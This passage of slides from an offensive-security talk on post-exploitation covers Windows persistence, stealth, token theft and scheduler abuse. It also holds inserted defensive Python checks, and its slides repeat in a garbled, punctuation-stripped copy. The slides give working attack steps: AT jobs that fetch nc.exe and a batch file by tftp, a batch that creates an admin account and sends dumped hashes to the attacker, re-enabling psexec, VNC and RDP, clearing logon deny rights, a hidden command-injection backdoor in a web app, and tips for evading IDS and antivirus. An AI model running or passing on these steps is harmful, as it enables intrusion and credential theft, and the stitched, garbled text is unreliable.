    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUTo
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy to use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the system control tool sc.exe
  – net use \\target\ipc$ /user:username userpassword
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =
  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
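An added defensive check, not from the slides, that reads the two artifacts of the slide 53/54 procedure in their exported form (a .reg export of the Terminal Server key and a secedit /export policy file) and reports every deviation from a baseline of who should hold or be denied the logon rights. The inputs and the baseline are constructed; the baseline SIDs S-1-5-32-555 (Remote Desktop Users) and S-1-5-32-546 (Guests) are well-known builtin groups.

```python
# Constructed inputs mirroring the two files on slides 53 and 54 after they
# have been applied, with the placeholder account replaced by an example
# name.  REG_SAMPLE is what `reg export` of the Terminal Server key yields;
# POLICY_SAMPLE is the [Privilege Rights] part of a `secedit /export /cfg`.
REG_SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
'''

POLICY_SAMPLE = r'''[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = *S-1-5-32-555,svc_backdoor
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-545
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =
'''

# Constructed baseline (assumption for this example): Remote Desktop Users may
# log on remotely, Guests must stay in the deny lists, nobody else.
BASELINE = {
    "seremoteinteractivelogonright":     {"*S-1-5-32-555"},
    "sedenyremoteinteractivelogonright": {"*S-1-5-32-546"},
    "sedenynetworklogonright":           {"*S-1-5-32-546"},
}

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_ini_like(text):
    """Parse .reg or secedit INI text into {section: {name_lowercase: value}}.

    Value names lose their surrounding quotes and are lower-cased, because
    secedit writes rights in mixed case while the .reg format quotes names.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            name, value = line.split("=", 1)
            sections[current][name.strip().strip('"').lower()] = value.strip()
    return sections


def reg_dword(value):
    """'dword:0000000a' -> 10; None for missing or non-DWORD values."""
    if value is None or not value.lower().startswith("dword:"):
        return None
    return int(value[len("dword:"):], 16)


def audit_remote_desktop(reg_text, policy_text, baseline):
    """Return human-readable findings for the RDP switch and the logon rights."""
    findings = []
    ts_values = parse_ini_like(reg_text).get(TS_KEY, {})
    if reg_dword(ts_values.get("fdenytsconnections")) == 0:
        findings.append("fDenyTSConnections=0: Remote Desktop connections are enabled")
    rights = parse_ini_like(policy_text).get("Privilege Rights", {})
    for right, expected in baseline.items():
        actual = {a.strip() for a in rights.get(right, "").split(",") if a.strip()}
        for extra in sorted(actual - expected):
            findings.append("%s: unexpected %s" % (right, extra))
        for missing in sorted(expected - actual):
            findings.append("%s: missing %s (deny list cleared?)" % (right, missing))
    return findings


if __name__ == "__main__":
    for finding in audit_remote_desktop(REG_SAMPLE, POLICY_SAMPLE, BASELINE):
        print(finding)
```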
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
  – Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm "tftp -i myip GET nc.exe"
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT
  – Flow
    • Establish authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i us GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to attacker host
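Since the slides point out that AT jobs run as SYSTEM and can stand in for a shell, here is an added defensive example, not from the slides, that parses an `at \\host` listing and flags jobs whose command lines look like the sequence on slides 58 and 61 (tftp pulls, account creation, admin group changes, hash dumpers, bare batch files). The listing is constructed and the patterns are assumptions about what is suspicious in a given environment.

```python
import re

# Constructed `at \\host` listing in the classic AT column layout: two jobs
# shaped like the slide 61 sequence and one ordinary maintenance job.
# Not captured from a real host.
AT_SAMPLE = """Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                   12:01 PM      tftp -i 10.0.0.5 GET e.bat
        2   Today                   12:02 PM      e.bat
        3   Each M T W Th F         02:00 AM      c:\\scripts\\nightly_backup.cmd
"""

# status (blank, Ok or Error), numeric id, day text, 12-hour time, command.
# The day column is separated from the time by two or more spaces.
AT_LINE = re.compile(
    r"^\s*(Error|Ok|)\s*(\d+)\s+(.*?)\s{2,}(\d{1,2}:\d{2}\s?[AP]M)\s+(.+?)\s*$")

# Assumed indicators, each tied to something the slides use AT for.
SUSPICIOUS = [
    (re.compile(r"\btftp\b.*\bget\b", re.I), "pulls a file with tftp"),
    (re.compile(r"\bnet\s+user\b.*/add\b", re.I), "creates a local account"),
    (re.compile(r"\bnet\s+localgroup\s+administrators\b.*/add\b", re.I),
     "adds a member to Administrators"),
    (re.compile(r"\b(pwdump|cachedump)", re.I), "runs a credential dumping tool"),
    (re.compile(r"^\s*\w+\.(bat|cmd)\s*$", re.I), "runs a bare batch file with no path"),
]


def parse_at_listing(text):
    """Turn AT listing text into job dicts; header, separator and blank lines are skipped."""
    jobs = []
    for line in text.splitlines():
        match = AT_LINE.match(line)
        if not match:
            continue
        status, job_id, day, when, command = match.groups()
        jobs.append({"id": int(job_id), "status": status or "OK",
                     "day": day.strip(), "time": when, "command": command})
    return jobs


def review_at_jobs(jobs):
    """Return (job id, command, reasons) for jobs matching any suspicious pattern."""
    findings = []
    for job in jobs:
        reasons = [why for pattern, why in SUSPICIOUS if pattern.search(job["command"])]
        if reasons:
            findings.append((job["id"], job["command"], reasons))
    return findings


if __name__ == "__main__":
    for job_id, command, reasons in review_at_jobs(parse_at_listing(AT_SAMPLE)):
        print("job %d: %s  <- %s" % (job_id, command, "; ".join(reasons)))
```

Every AT job is worth a look regardless of pattern hits, because the scheduler runs it as SYSTEM; the same review applies to the output of `schtasks /query /fo csv /v` on hosts without the AT command.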
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish netbios session credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 11
Password Management Stages & Techniques
  – Acquiring: pwdump, cat /etc/shadow, cachedump, sql query, sniffing
  – Decisions: Prioritize accounts to crack
  – Cracking: John, l0pht, Cain
  – Tracking: Nothing
  – Reusing: Core Impact
Slide 12
Manual Password Management
• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain & Abel
    • Static table, difficult to export / use / automate
    • Password Classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage management capability
  – Text file / John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable
Slide 13
Slide 14
• MetaPass
• Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
  – In the old days a rootkit helped you maintain root
  – Today rootkits are all about hiding
  – These two concepts still go hand in hand
Slide 17
Persistence
• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1 shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter
Slide 18
Persistence
• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use
    • FUZZY – OS, Environment, Target dependent
  – Setup – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace
Slide 19
Persistence
• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.
Slide 20
Persistence
• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in
Slide 21
Persistence
• Leveraging existing persistent admin access
• Nagios checks
• Attack Configuration Management
  – Cfengine
  – SMS
  – Automated Patching Systems ("patch" them with our trojans)
• GUIs
• Tool distribution
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth Evading Detection
• Goals
  – Keep the system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth Evading Detection
• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis, anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth Evading Detection
• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
